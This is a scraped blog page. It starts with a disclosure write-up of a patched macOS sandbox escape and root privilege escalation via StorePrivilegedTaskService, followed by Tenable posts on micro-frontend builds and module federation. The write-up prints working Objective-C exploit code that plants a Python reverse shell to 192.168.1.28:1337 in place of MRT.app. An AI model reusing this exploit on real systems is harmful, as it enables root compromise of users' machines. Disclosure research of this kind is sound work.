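
```python
import re

# Directory and file rules copied from the profile above (unanchored).
DIR_RULE = re.compile(r"\.app(download)?(/Contents)?")
ICON_RULE = re.compile(r"\.appdownload/Icon")

# Hypothetical tightened variant of the file rule, anchored with $.
ICON_RULE_ANCHORED = re.compile(r"\.appdownload/Icon$")


def allowed(rule, path):
    """A rule applies if the pattern matches anywhere in the path."""
    return rule.search(path) is not None


# Illustrative path of an executable hidden below an "Icon" directory.
payload = "/private/tmp/bar.appdownload/Icon/foo.app/Contents/MacOS/MRT"

print(allowed(ICON_RULE, payload))           # unanchored rule matches
print(allowed(ICON_RULE_ANCHORED, payload))  # anchored rule does not
print(allowed(DIR_RULE, "/Applications/Microsoft Teams.app"))
```

With the unanchored pattern, any file below a directory named `Icon` inside a `.appdownload` bundle satisfies the rule, not just the icon file itself.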

By creating a specific directory structure in the temporary files directory of our sandboxed application:

bar.appdownload/Icon/

Both the sandboxed application and the StorePrivilegedTaskService have full access inside the Icon folder. Therefore, it would be possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler: on the executable to dequarantine it.

Privesc

This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.

Creating a new launch daemon or cron job is a common way to escalate privileges through file creation, but the path requirements of the sandbox profile would only allow writing to a subdirectory of a subdirectory of the directories that hold these config files, so this did not work.

An option that would work would be to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools, the daemon points into the application bundle itself:

/Library/LaunchDaemons/com.microsoft.teams.TeamsUpdaterDaemon.plist

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Label</key>
	<string>com.microsoft.teams.TeamsUpdaterDaemon</string>
	<key>MachServices</key>
	<dict>
		<key>com.microsoft.teams.TeamsUpdaterDaemon</key>
		<true/>
	</dict>
	<key>Program</key>
	<string>/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon</string>
</dict>
</plist>

The following would work for privilege escalation:

  1. Ask StorePrivilegedTaskService to move /Applications/Microsoft Teams.app somewhere else. Allowed, because the path of the directory contains .app (see footnote 1).
  2. Move a new app bundle to /Applications/Microsoft Teams.app, which contains a malicious executable file at Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon.
  3. Connect to the com.microsoft.teams.TeamsUpdaterDaemon Mach service.

However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as a privilege escalation without this requirement, so we kept looking. The requirements are somewhat contradictory: typically anything bundled into an .app bundle runs as a normal user, not as root. In addition, the Signed System Volume on macOS Big Sur means changing any of the built-in applications is also impossible.

By an impressive and ironic coincidence, there is an application which is installed on a new macOS installation, is not on the SSV, and runs automatically as root: MRT.app, the “Malware Removal Tool”. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updateable without performing a full system upgrade because they might be needed quickly. This means in particular that MRT.app is not on the SSV. Most malware is removed by signature or hash checks for malicious content; MRT is the more heavy-handed solution for cases where Apple needs to add code to perform the removal.

Although MRT.app is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.

Our complete attack consists of the following steps, from sandboxed application to code execution as root:

  1. Create a new application bundle bar.appdownload/Icon/foo.app in the temporary directory of our sandboxed application containing a malicious executable.
  2. Load the AppStoreDaemon.framework framework and connect to the StorePrivilegedTaskService XPC service.
  3. Ask StorePrivilegedTaskService to change the quarantine attribute for the executable file to allow it to launch without a prompt.
  4. Ask StorePrivilegedTaskService to move /Library/Apple/System/Library/CoreServices/MRT.app to a different location.
  5. Ask StorePrivilegedTaskService to move bar.appdownload/Icon/foo.app from the temporary directory to /Library/Apple/System/Library/CoreServices/MRT.app.
  6. Wait for a reboot.

See the full function here:

/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac App Store sandbox of this process allow access.
NSString *path = [NSTemporaryDirectory() stringByAppendingPathComponent:@"bar.appdownload/Icon/foo.app"];
NSFileManager *fm = [NSFileManager defaultManager];
NSError *error = nil;

/// Cleanup, if needed.
[fm removeItemAtPath:path error:nil];

[fm createDirectoryAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS"] withIntermediateDirectories:TRUE attributes:nil error:&error];

assert(!error);

/// Create the payload. This example uses a Python reverse shell to 192.168.1.28:1337.
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.1.28\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);" writeToFile:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] atomically:TRUE encoding:NSUTF8StringEncoding error:&error];

assert(!error);

/// Make the payload executable
[fm setAttributes:@{NSFilePosixPermissions: [NSNumber numberWithShort:0777]} ofItemAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] error:&error];

assert(!error);

/// Load the framework, so the XPC service can be resolved.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];
[conn resume];

/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:withReplyHandler:` method to create an unquarantined file.
[conn.remoteObjectProxy setExtendedAttributeAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] name:@"com.apple.quarantine" value:[@"00C3;60018532;Safari;" dataUsingEncoding:NSUTF8StringEncoding] withReplyHandler:^(NSError *result) {
    NSLog(@"%@", result);

    assert(result == nil);

    srand((unsigned int)time(NULL));

    /// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
    /// However, to move a directory, the permissions on the contents do not matter.
    /// It is moved to a randomly named directory, because the service refuses if it already exists.
    [conn.remoteObjectProxy moveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/MRT.app/" toPath:[NSString stringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT%d.app/", rand()]
                               withReplyHandler:^(NSError *result) {
        NSLog(@"Result: %@", result);

        assert(result == nil);

        /// Move the malicious directory in place of MRT.app.
        [conn.remoteObjectProxy moveAssetPackAtPath:path toPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT.app/" withReplyHandler:^(NSError *result) {
            NSLog(@"Result: %@", result);

            /// At launch, /Library/Apple/System/Library/CoreServices/MRT.app/Contents/MacOS/MRT -d is started. So now time to wait for that...
        }];
    }];
}];

Fix

Apple has pushed out a fix in the macOS 11.4 release. They implemented all three of the recommended changes:

  1. The entitlements of the process initiating the connection to StorePrivilegedTaskService are now checked.
  2. The sandboxing profile of StorePrivilegedTaskService was tightened.
  3. The path traversal vulnerabilities for the subdirectory check were fixed.

This means that the vulnerability is not just fixed: even if the missing connection check were reintroduced later, it is unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.


  1. This is actually a quite interesting aspect of the macOS sandbox: to delete a directory, the process needs to have file-write-unlink permission on all of the contents, as each file in it must be deleted. To move a directory somewhere else, only permissions on the directory itself and its destination are needed! ↩︎

9. Wrapping Up Our Journey Implementing a Micro Frontend

16 December 2021 at 18:46

We hope you now have a better understanding of how you can successfully create a micro-frontend architecture. Before we call it a day, let’s give a quick recap of what was covered.

What You Learned

  • Why We Implemented a Micro Frontend — You learned where we started, specifically what our architecture used to look like and where the problems existed. You then learned how we planned on solving those problems with a new architecture.
  • Introducing the Monorepo and NX — You learned how we combined two of our repositories into one: a monorepo. You then saw how we leveraged the NX framework to identify which part of the repository changed, so we only needed to rebuild that portion.
  • Introducing Module Federation — You learned how we leverage webpack's module federation to break our main application into a series of smaller applications called micro-apps, so that these applications can be built and deployed independently of one another.
  • Module Federation — Managing Your Micro-Apps — You learned how we consolidated configurations and logic pertaining to our micro-apps so we could easily manage and serve them as our codebase continued to grow.
  • Module Federation — Sharing Vendor Code — You learned the importance of sharing vendor library code between applications and some related best practices.
  • Module Federation — Sharing Library Code — You learned the importance of sharing custom library code between applications and some related best practices.
  • Building and Deploying — You learned how we build and deploy our application using this new model.

Key Takeaways

If you take anything away from this series, let it be the following:

The Earlier, The Better

We can tell you from experience that implementing an architecture like this is much easier if you have the opportunity to start from scratch. If you are lucky enough to start from scratch when building out an application and are interested in a micro-frontend, laying the foundation before anything else is going to make your development experience much better.

Evaluate Before You Act

Before you decide on an architecture like this, make sure it’s really what you want. Take the time to assess your issues and how your company operates. Without company support, pulling off this approach is extremely difficult.

Only Build What Changed

Using a tool like NX is critical to a monorepo, allowing you to only rebuild those parts of the system that were impacted by a change.

Micro-Frontends Are Not For Everyone

We know this type of architecture is not for everyone, and you should truly consider what your organization needs before going down this path. However, it has been very rewarding for us, and has truly transformed how we deliver solutions to our customers.

Don’t Forget To Share

When it comes to module federation, sharing is key. Learning when and how to share code is critical to the successful implementation of this architecture.

Be Careful Of What You Share

Sharing things like state between your micro-apps is a dangerous thing in a micro-frontend architecture. Learning to put safeguards in place around these areas is critical, as well as knowing when it might be necessary to deploy all your applications at once.

Summary

We hope you enjoyed this series and learned a thing or two about the power of NX and module federation. If this article can help just one engineer avoid a mistake we made, then we’ll have done our job. Happy coding!


9. Wrapping Up Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium.

8. Building & Deploying

16 December 2021 at 18:45

This is post 8 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article documents the final phase of our new architecture where we build and deploy our application utilizing our new micro-frontend model.

The Problem

If you have followed along up until this point, you can see how we started with a relatively simple architecture. Like a lot of companies, our build and deployment flow looked something like this:

  1. An engineer merges their code to master.
  2. A Jenkins build is triggered that lints, tests, and builds the entire application.
  3. The built application is then deployed to a QA environment.
  4. End-2-End (E2E) tests are run against the QA environment.
  5. The application is deployed to production. In a CI/CD flow this occurs automatically if the E2E tests pass; otherwise it is a manual deployment.

In our new flow this would no longer work. In fact, one of our biggest challenges in implementing this new architecture was in setting up the build and deployment process to transition from a single build (as demonstrated above) to multiple applications and libraries.

The Solution

Our new solution involved three primary Jenkins jobs:

  1. Seed Job — Responsible for identifying what applications/libraries needed to be rebuilt (via the nx affected command). Once this was determined, its primary purpose was to kick off one or more of the next two job types.
  2. Library Job — Responsible for linting and testing any library workspace that was impacted by a change.
  3. Micro-App Jobs — A series of jobs pertaining to each micro-app. Responsible for linting, testing, building, and deploying the micro-app.

With this understanding in place, let’s walk through the steps of the new flow:

Phase 1 — In our new flow, phase 1 includes building and deploying the code to our QA environments where it can be properly tested and viewed by our various internal stakeholders (engineers, quality assurance, etc.):

  1. An engineer merges their code to master. In the diagram below, an engineer on Team 3 merges some code that updates something in their application (Application C).
  2. The Jenkins seed job is triggered, and it identifies what applications and libraries were impacted by this change. This job now kicks off an entirely independent pipeline related to the updated application. In this case, it kicked off the Application C pipeline in Jenkins.
  3. The pipeline now lints, tests, and builds Application C. It’s important to note here how it’s only dealing with a piece of the overall application. This greatly improves the overall build times and avoids long queues of builds waiting to run.
  4. The built application is then deployed to the QA environments.
  5. End-2-End (E2E) tests are run against the QA environments.
  6. Our deployment is now complete. For our purposes, we felt that a manual deployment to production was a safe approach for us and one that still offered us the flexibility and efficiency we needed.
Phase 1 Highlighted — Deploying to QA environments

Phase 2 — This phase (shown in the diagram after the dotted line) occurred when an engineer was ready to deploy their code to production:

  1. An engineer deployed their given micro-app to staging. In this case, the engineer would go into the build for Application C and deploy from there.
  2. For our purposes, we deployed to a staging environment before production to perform a final spot check on our application. In this type of architecture, some bugs only show up because of the decoupled nature of your micro-apps. You can read more about this type of issue in the previous article under the Sharing State/Storage/Theme section. This final staging environment allowed us to catch these issues before they made their way to production.
  3. The application is then deployed to production.
Phase 2 Highlighted — Deploying to production environments

While this flow has more steps than our original one, we found that the pros outweigh the cons. Our builds are now more efficient as they can occur in parallel and only have to deal with a specific part of the repository. Additionally, our teams can now move at their own pace, deploying to production when they see fit.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn the specifics of how we build and deploy our applications.

Build Strategy

We will now look at the three job types introduced above in more detail: the seed job, the library job, and the micro-app jobs.

The Seed Job

This job is responsible for first identifying what applications/libraries needed to be rebuilt. How is this done? We will now come full circle and understand the importance of introducing the NX framework that we discussed in a previous article. By taking advantage of this framework, we created a system by which we could identify which applications and libraries (our “workspaces”) were impacted by a given change in the system (via the nx affected command). Leveraging this functionality, the build logic was updated to include a Jenkins seed job. A seed job is a normal Jenkins job that runs a Job DSL script and in turn, the script contains instructions that create and trigger additional jobs. In our case, this included micro-app jobs and/or a library job which we’ll discuss in detail later.
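As a rough illustration of the decision the seed job makes, here is a minimal Python sketch. It assumes the list of affected workspace names has already been obtained (for example from the nx affected command; how that output is collected is left out), and it assumes that every workspace that is not a micro-app is a library. The function name and the workspace names are hypothetical.

```python
def plan_jobs(affected, apps):
    """Decide which downstream jobs a seed job would trigger.

    affected: names of workspaces impacted by the change.
    apps:     names of all micro-app workspaces in the repository.
    Returns (micro_app_jobs, run_library_job).
    """
    affected = set(affected)
    apps = set(apps)
    # One job per affected micro-app, in a stable order.
    micro_app_jobs = sorted(affected & apps)
    # Assumption: any affected workspace that is not an app is a library.
    run_library_job = bool(affected - apps)
    return micro_app_jobs, run_library_job


jobs, libs = plan_jobs(["application-c", "lib-1"], {"host", "application-c"})
print(jobs, libs)
```

In our real setup this logic lives in a Job DSL script run by Jenkins; the sketch only mirrors the shape of the decision.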

Jenkins Status — An important aspect of the seed job is to provide a visualization for all the jobs it kicks off. All the triggered application jobs are shown in one place along with their status:

  • Green — Successful build
  • Yellow — Unstable
  • Blue — Still processing
  • Red (not shown) — Failed build

GitHub Status — Since multiple independent Jenkins builds are triggered for the same commit ID, we had to pay attention to how the changes are represented in GitHub so as not to lose visibility of broken builds in the PR process. Each job registers itself with GitHub under a unique context, providing feedback on which sub-job failed directly in the PR process:

Performance, Managing Dependencies — Before a given micro-app and/or library job can perform its necessary steps (lint, test, build), it needs to install the necessary dependencies for those actions (those defined in the package.json file of the project). Doing this every single time a job is run is very costly in terms of resources and performance. Since all of these jobs need the same dependencies, it makes much more sense if we can perform this action once so that all the jobs can leverage the same set of dependencies.

To accomplish this, the node execution environment was dockerised with all necessary dependencies installed inside a container. As shown below, the seed job maintains the responsibility for keeping this container in sync with the required dependencies. The seed job determines if a new container is required by checking if changes have been made to package.json. If changes are made, the seed job generates the new container prior to continuing any further analysis and/or build steps. The jobs that are kicked off by the seed (micro-app jobs and the library job) can then leverage that container for use:
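One possible way to detect that package.json has changed is to derive the container tag from a hash of its contents. The following Python sketch shows that idea; it is an assumption for illustration, not a description of our actual check, and the tag prefix `node-deps-` and both function names are hypothetical.

```python
import hashlib


def container_tag(package_json_text):
    """Derive a deterministic tag from the contents of package.json."""
    digest = hashlib.sha256(package_json_text.encode("utf-8")).hexdigest()
    return "node-deps-" + digest[:12]


def needs_new_container(package_json_text, existing_tags):
    """A new container is needed when no existing tag matches the manifest."""
    return container_tag(package_json_text) not in set(existing_tags)


manifest = '{"dependencies": {"react": "17.0.2"}}'
print(needs_new_container(manifest, []))                         # nothing built yet
print(needs_new_container(manifest, [container_tag(manifest)]))  # already built
```

Because the tag depends only on the manifest contents, every job started by the same seed job resolves to the same container.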

This approach led to the following benefits:

  • Proved to be much faster than downloading all development dependencies for each build step every time they were needed.
  • The use of a pre-populated container reduced the load on the internal Nexus repository manager as well as the network traffic.
  • Allowed us to run the various build steps (lint, unit test, package) in parallel thus further improving the build times.

Performance, Limiting The Number Of Builds Run At Once — To facilitate the smooth operation of the system, the seed jobs on master and feature branch builds use slightly different logic with respect to the number of builds that can be kicked off at any one time. This is necessary as we have a large number of active development branches and triggering excessive jobs can lead to resource shortages, especially with required agents. When it comes to the concurrency of execution, the differences between the two are:

  • Master branch — Commits immediately trigger all builds concurrently.
  • Feature branches — Allow only one seed job per branch to avoid system overload as every commit could trigger 10+ sub jobs depending on the location of the changes.

Another way we reduce the number of builds generated is in how the nx affected command gets used by the master branch versus the feature branches:

  • Master branch — Will be called against the latest tag created for each application build. Each master / production build produces a tag of the form APP<uniqueAppId>_<buildversion>. This is used to determine if the specific application needs to be rebuilt based on the changes.
  • Feature branches — We use master as a reference for the first build on the feature branch, and any subsequent build will use the commit-id of the last successful build on that branch. This way, we are not constantly rebuilding all applications that may be affected by a diff against master, but only the applications that are changed by the commit.
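The choice of comparison point described above can be sketched in Python as follows. The function and parameter names are hypothetical, and returning `None` on master when no tag exists yet (meaning "no comparison point, rebuild") is an assumption the text does not cover.

```python
def choose_base_ref(branch, latest_app_tag=None, last_successful_commit=None):
    """Pick the reference a change is compared against.

    branch:                 name of the branch being built.
    latest_app_tag:         most recent APP<uniqueAppId>_<buildversion> tag
                            for the application in question, if any.
    last_successful_commit: commit ID of the last successful build on a
                            feature branch, if any.
    """
    if branch == "master":
        # Master compares against the latest tag of the application.
        # Assumption: None signals that no earlier build exists.
        return latest_app_tag
    # First build on a feature branch compares against master; later
    # builds compare against the last successful build on that branch.
    return last_successful_commit or "master"


print(choose_base_ref("feature/login"))
print(choose_base_ref("feature/login", last_successful_commit="abc123"))
```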

To summarize the role of the seed job, the diagram below showcases the logical steps it takes to accomplish the tasks discussed above.

The Library Job

We will now dive into the jobs that the seed job kicks off, starting with the library job. As discussed in our previous articles, our applications share code from a libs directory in our repository.

Before we go further, it’s important to understand how library code gets built and deployed. When a micro-app is built (ex. nx build host), its deployment package contains not only the application code but also all the libraries that it depends on. When we build the Host and Application 1, it creates a number of files starting with “libs_…” and “node_modules…”. This demonstrates how all the shared code (both vendor libraries and your own custom libraries) needed by a micro-app is packaged within (i.e. the micro-apps are self-reliant). While it may look like your given micro-app is extremely bloated in terms of the number of files it contains, keep in mind that a lot of those files may not actually get leveraged if the micro-apps are sharing things appropriately.

This means building the actual library code is a part of each micro-app’s build step, which is discussed below. However, if library code is changed, we still need a way to lint and test that code. If you kicked off 5 micro-app jobs, you would not want each of those jobs to perform this action as they would all be linting and testing the exact same thing. Our solution to this was to have a separate Jenkins job just for our library code, as follows:

  1. Using the nx affected:libs command, we determine which library workspaces were impacted by the change in question.
  2. Our library job then lints/tests those workspaces. In parallel, our micro-apps also lint, test and build themselves.
  3. Before a micro-app can finish its job, it checks the status of the libs build. As long as the libs build was successful, it proceeds as normal. Otherwise, all micro-apps fail as well.

The Micro-App Jobs

Now that you understand how the seed and library jobs work, let’s get into the last job type: the micro-app jobs.

Configuration — As discussed previously, each micro-app has its own Jenkins build. The build logic for each application is implemented in a micro-app specific Jenkinsfile that is loaded at runtime for the application in question. The pattern for these small snippets of code looks something like the following:

The jenkins/Jenkinsfile.template (leveraged by each micro-app) defines the general build logic for a micro-application. The default configuration in that file can then be overwritten by the micro-app:

This approach allows all our build logic to be in a single place, while easily allowing us to add more micro-apps and scale accordingly. This combined with the job DSL makes adding a new application to the build / deployment logic a straightforward and easy to follow process.

Managing Parallel Jobs — When we first implemented the build logic for the jobs, we attempted to implement as many steps as possible in parallel to make the builds as fast as possible, which you can see in the Jenkins parallel step below:

After some testing, we found that linting + building the application together takes about as much time as running the unit tests for a given product. As a result, we combined the two steps (linting, building) into one (assets-build) to optimize the performance of our build. We highly recommend you do your own analysis, as this will vary per application.
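To make the idea of balancing parallel branches concrete, here is a small Python stand-in for a parallel step. It is not Jenkins pipeline code; the `run_parallel` helper and the step names are hypothetical, and the lambdas stand in for real lint, build and test commands.

```python
from concurrent.futures import ThreadPoolExecutor


def run_parallel(steps):
    """Run named steps concurrently and return {name: result}.

    steps: non-empty dict mapping a step name to a zero-argument callable.
    """
    with ThreadPoolExecutor(max_workers=len(steps)) as pool:
        futures = {name: pool.submit(fn) for name, fn in steps.items()}
        # result() blocks until the step finishes and re-raises its errors.
        return {name: future.result() for name, future in futures.items()}


def assets_build():
    """Linting and building combined into one branch."""
    return ["lint ok", "build ok"]


results = run_parallel({
    "assets-build": assets_build,
    "unit-test": lambda: ["tests ok"],
})
print(results)
```

The total time of a parallel step is the time of its slowest branch, which is why merging two short steps into one branch of similar length to the tests costs nothing while saving an agent.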

Deployment strategy

Now that you understand how the build logic works in Jenkins, let’s see how things actually get deployed.

Checkpoints — When an engineer is ready to deploy their given micro-app to production, they use a checkpoint. Upon clicking into the build they wish to deploy, they select the checkpoints option. As discussed in our initial flow diagram, we force our engineers to first deploy to our staging environment for a final round of testing before they deploy their application to production.

The particular build in Jenkins that we wish to deploy
The details of the job above where we have the ability to deploy to staging via a checkpoint

Once approval is granted, the engineer can then deploy the micro-app to production using another checkpoint:

The build in Jenkins that was created after we clicked deployToQAStaging
The details of the job above where we have the ability to deploy to production via a checkpoint

S3 Strategy — The new logic required a rework of the whole deployment strategy as well. In our old architecture, the application was deployed as a whole to a new S3 location and then the central gateway application was informed of the new location. This forced the clients to reload the entire application as a whole.

Our new strategy reduces the deployment impact to the customer by only updating the code on S3 that actually changed. This way, whenever a customer pulls down the code for the application, they are pulling a majority of the code from their browser cache and only updated files have to be brought down from S3.

One thing we had to be careful about was ensuring the index.html file is only updated after all the granular files are pushed to S3. Otherwise, we run the risk of our updated application requesting files that may not have made their way to S3 yet.
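The ordering constraint can be sketched in Python like this. The sketch assumes that each file is identified by a content hash and that the hashes of the files already on S3 are known; the function name and the dictionaries are hypothetical, and the actual upload call is left out.

```python
def plan_upload(local_hashes, remote_hashes, entry_point="index.html"):
    """Return the files to upload, in order.

    local_hashes / remote_hashes: dicts mapping a file path to a content hash.
    Only files whose hash differs from the remote copy are uploaded, and the
    entry point always goes last so it never references a missing file.
    """
    changed = [path for path, digest in sorted(local_hashes.items())
               if remote_hashes.get(path) != digest]
    assets = [path for path in changed if path != entry_point]
    tail = [entry_point] if entry_point in changed else []
    return assets + tail


local = {"index.html": "h2", "main.js": "a9", "vendor.js": "77"}
remote = {"index.html": "h1", "main.js": "a1", "vendor.js": "77"}
print(plan_upload(local, remote))
```

In this example `vendor.js` is unchanged and is skipped, so clients keep serving it from their browser cache.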

Bootstrapper Job — As discussed above, micro-apps are typically deployed to an environment via an individual Jenkins job:

However, we ran into a number of instances where we needed to deploy all micro-apps at the same time. This included the following scenarios:

  • Shared state — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state. When we made updates to these areas, we could encounter bugs when the apps got out of sync.
  • Shared theme — Since we also had a global theme that all micro-apps inherited from, we could encounter styling issues when the theme was updated and apps got out of sync.
  • Vendor Library Update — Updating a vendor library like React, where only one version of the library can be loaded at a time.

To address these issues, we created the bootstrapper job. This job has two steps:

  1. Build — The job is run against a specific environment (qa-development, qa-staging, etc.) and pulls down a completely compiled version of the entire application.
  2. Deploy — The artifact from the build step can then be deployed to the specified environment.

Conclusion

Our new build and deployment flow was the final piece of our new architecture. Once it was in place, we were able to successfully deploy individual micro-apps to our various environments in a reliable and efficient manner. Please see the last article in this series for a quick recap of everything we learned.


8. Building & Deploying was originally published in Tenable TechBlog on Medium.

7. Module Federation — Sharing Library Code

16 December 2021 at 18:44

This is post 7 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing your custom library code between applications and some related best practices.

The Problem

As discussed in the previous article, sharing code is critical to using module federation successfully. In the last article we focused on sharing vendor code. Now, we want to take those same principles and apply them to the custom library code we have living in the libs directory. As illustrated below, App A and B both use Lib 1. When these micro-apps are built, they each contain a version of that library within their build artifact.

Assuming you read the previous article, you now know why this is important. As shown in the diagram below, when App A is loaded in, it pulls down all the libraries shown. When App B is loaded in it’s going to do the same thing. The problem is once again that App B is pulling down duplicate libraries that App A has already loaded in.

The Solution

Similar to the vendor libraries approach, we need to tell module federation that we would like to share these custom libraries. This way, once we load in App B, it’s first going to check what App A has already loaded and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it will proceed to load its own. And if a micro-app is the only one using a given library, it will simply bundle a version of that library within itself (ex. Lib 2).

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing custom library code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

To demonstrate sharing libraries, we’re going to focus on Test Component 1 that is imported by the Host and Application 1:

This particular component lives in the design-system/components workspace:

We leverage the tsconfig.base.json file to build out our aliases dynamically based on the component paths defined in that file. This is an easy way to ensure that as new paths are added to your libraries, they are automatically picked up by webpack:

The aliases in our webpack.config are built dynamically based off the paths in the tsconfig.base.json file
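As a rough sketch of this idea, the snippet below derives alias entries from a `paths` object. The `buildAliases` helper, the `/workspace` root, and the `.ts` file extension are assumptions made for illustration; a real webpack config would typically read tsconfig.base.json from disk and use `path.resolve`.

```javascript
// Hypothetical excerpt of the "paths" section of tsconfig.base.json.
const tsconfigPaths = {
  "@microfrontend-demo/design-system/components": [
    "libs/design-system/components/src/index.ts",
  ],
};

// Turns every tsconfig path entry into a webpack resolve.alias entry.
// rootDir is the workspace root (plain string concatenation keeps the
// sketch dependency-free).
function buildAliases(paths, rootDir) {
  const aliases = {};
  for (const [name, targets] of Object.entries(paths)) {
    // tsconfig allows several fallback targets per path; this sketch uses the first.
    aliases[name] = `${rootDir}/${targets[0]}`;
  }
  return aliases;
}

const aliases = buildAliases(tsconfigPaths, "/workspace");
// The result is meant for the resolve.alias field of the webpack config,
// for example: { resolve: { alias: aliases } }
console.log(aliases);
```

Because the aliases are computed rather than hand-written, adding a new path to tsconfig.base.json is enough for webpack to pick it up.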

How does webpack currently treat this library code? If we were to investigate the network traffic before sharing anything, we would see that the code for this component is embedded in two separate files specific to both Host and Application 1 (the code specific to Host is shown below as an example). At this point the code is not shared in any way and each application simply pulls the library code from its own bundle.

As your application grows, so does the amount of code you share. At a certain point, it becomes a performance issue when each application pulls in its own unique library code. We’re now going to update the shared property of the ModuleFederationPlugin to include these custom libraries.

Sharing our libraries is similar to the vendor libraries discussed in the previous article. However, the mechanism of defining a version is different. With vendor libraries, we were able to rely on the versions defined in the package.json file. For our custom libraries, we don’t have this concept (though you could technically introduce something like that if you wanted). To solve this problem, we decided to use a unique identifier to identify the library version. Specifically, when we build a particular library, we actually look at the folder containing the library and generate a unique hash based off of the contents of the directory. This way, if the contents of the folder change, then the version does as well. By doing this, we can ensure micro-apps will only share custom libraries if the contents of the library match.

We leverage the hashElement method from folder-hash library to create our hash ID
Each lib now has a unique version based on the hash ID generated

Note: We are once again leveraging the tsconfig.base.json to dynamically build out the libs that should be shared. We used a similar approach above for building out our aliases.
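To make the versioning idea concrete, here is a small sketch under stated assumptions. The article relies on `hashElement` from folder-hash to hash a directory; to stay dependency-free, this sketch swaps in a simple FNV-1a-style hash over an in-memory map of file names to contents. The `hashLibrary` and `sharedLibEntry` helpers are hypothetical, and using the hash for both `version` and `requiredVersion` is this sketch's reading of the approach, not a confirmed detail of the original config.

```javascript
// Stand-in for a directory hash: an FNV-1a-style hash over the sorted file
// names and their contents. Any change to a file changes the result.
function hashLibrary(files) {
  let hash = 0x811c9dc5;
  for (const name of Object.keys(files).sort()) {
    for (const char of `${name}\n${files[name]}\n`) {
      hash ^= char.codePointAt(0);
      hash = Math.imul(hash, 0x01000193) >>> 0;
    }
  }
  return hash.toString(16).padStart(8, "0");
}

// Builds one entry for the `shared` option, using the content hash as the
// library's version so only identical builds of the library are shared.
function sharedLibEntry(libName, files) {
  const version = hashLibrary(files);
  return { [libName]: { version, requiredVersion: version } };
}

// Hypothetical library contents.
const before = sharedLibEntry("@microfrontend-demo/design-system/components", {
  "index.ts": "export const a = 1;",
});
const after = sharedLibEntry("@microfrontend-demo/design-system/components", {
  "index.ts": "export const a = 2;",
});
console.log(before, after);
```

Two micro-apps built from the same library contents end up with the same version string, while any edit to the library produces a new one.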

If we investigate the network traffic again and look for libs_design-system_components (webpack’s filename for the import from @microfrontend-demo/design-system/components), we can see that this particular library has now been split into its own individual file. Furthermore, only one version gets loaded by the Host application (port 3000). This indicates that we are now sharing the code from @microfrontend-demo/design-system/components between the micro-apps.

Going More Granular

Before You Proceed: If you wish to see the code associated with the following section, you can check it out in this branch.

Currently, when we import one of the test components, it comes from the index file shown below. This means the code for all three of these components gets bundled together into one file shown above as “libs_design-system_components_src_index…”.

Imagine that we continue to add more components:

You may get to a certain point where you think it would be beneficial to not bundle these files together into one big file. Instead, you want to import each individual component. Since the alias configuration in webpack is already leveraging the paths in the tsconfig.base.json file to build out these aliases dynamically (discussed above), we can simply update that file and provide all the specific paths to each component:
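As a rough sketch of what such per-component entries might look like, the hypothetical `granularPaths` helper below generates one `paths` entry per component. The component names, the `src/lib` directory, and the `.tsx` extension are all assumptions for illustration.

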